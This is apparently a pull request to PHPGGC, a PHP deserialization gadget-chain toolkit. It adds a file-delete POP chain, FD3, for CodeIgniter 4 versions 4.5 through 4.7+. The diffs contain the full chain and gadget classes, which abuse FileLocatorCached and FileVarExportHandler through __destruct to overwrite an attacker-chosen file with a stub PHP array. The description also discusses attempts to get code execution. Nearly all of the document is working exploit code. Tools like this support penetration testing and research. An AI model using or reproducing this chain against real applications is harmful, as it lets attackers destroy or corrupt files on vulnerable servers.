### PR TITLE
Adding File Delete for CodeIgniter framework

### DIFF
--- a/gadgetchains/CodeIgniter4/FD/3/chain.php
+++ b/gadgetchains/CodeIgniter4/FD/3/chain.php
@@ -11,7 +11,6 @@ class FD3 extends \PHPGGC\GadgetChain\FileDelete
 
     public function generate(array $parameters)
     {
-
         $obj = new \CodeIgniter\Autoloader\FileLocatorCached($parameters['remote_path']);
         $obj->cacheHandler = new \CodeIgniter\Cache\FactoriesCache\FileVarExportHandler();
         return $obj;

--- a/gadgetchains/CodeIgniter4/FD/3/chain.php
+++ b/gadgetchains/CodeIgniter4/FD/3/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\CodeIgniter4;
 
 class FD3 extends \PHPGGC\GadgetChain\FileDelete
 {
-    public static $version = '';
+    public static $version = '4.5 <= 4.7+';
     public static $vector = '__destruct';
     public static $author = 'reverseth';
     public static $information = 'Actually, this POP chain writes (or replaces the content of) the choosen file with the following content : "<?php return array (0 => \'\',);" It is also possible to choose a string to write inside the array ("<?php return array (0 => \'<here>\',);"), but I did not find a way to execute it. Thus, I decided to push it as a FD, and not as a FW.';

--- a/gadgetchains/CodeIgniter4/FD/3/chain.php
+++ b/gadgetchains/CodeIgniter4/FD/3/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\CodeIgniter4;
+
+class FD3 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '';
+    public static $vector = '__destruct';
+    public static $author = 'reverseth';
+    public static $information = 'Actually, this POP chain writes (or replaces the content of) the choosen file with the following content : "<?php return array (0 => \'\',);" It is also possible to choose a string to write inside the array ("<?php return array (0 => \'<here>\',);"), but I did not find a way to execute it. Thus, I decided to push it as a FD, and not as a FW.';
+
+    public function generate(array $parameters)
+    {
+
+        $obj = new \CodeIgniter\Autoloader\FileLocatorCached($parameters['remote_path']);
+        $obj->cacheHandler = new \CodeIgniter\Cache\FactoriesCache\FileVarExportHandler();
+        return $obj;
+    }
+}

--- a/gadgetchains/CodeIgniter4/FD/3/gadgets.php
+++ b/gadgetchains/CodeIgniter4/FD/3/gadgets.php
@@ -1,0 +1,27 @@
+<?php
+
+namespace CodeIgniter\Cache\FactoriesCache
+{
+    class FileVarExportHandler 
+    {
+        public $path = "";
+
+        //public function __construct() {}
+    }
+}
+
+namespace CodeIgniter\Autoloader
+{
+    class FileLocatorCached
+    {
+        public $cacheUpdated = true;
+        public $cacheKey;
+        public $cache = [""];
+        public $cacheHandler;
+        
+        public function __construct($remote_path) 
+        {
+            $this->cacheKey = $remote_path;
+        }
+    }
+}

--- a/gadgetchains/CodeIgniter4/FD/3/gadgets.php
+++ b/gadgetchains/CodeIgniter4/FD/3/gadgets.php
@@ -5,8 +5,6 @@ namespace CodeIgniter\Cache\FactoriesCache
     class FileVarExportHandler 
     {
         public $path = "";
-
-        //public function __construct() {}
     }
 }
 


### PR DESCRIPTION
Actually, this POP chain writes (or replaces the content of) the chosen file with the following content : 
```
<?php return array (
    0 => '',
);
```

It is also possible to choose a string to write inside the array 
```
<?php return array (
    0 => '<here>',
);
```

But I did not find a way to execute it.
Thus, I decided to push it as a FD, and not as a FW, for the moment.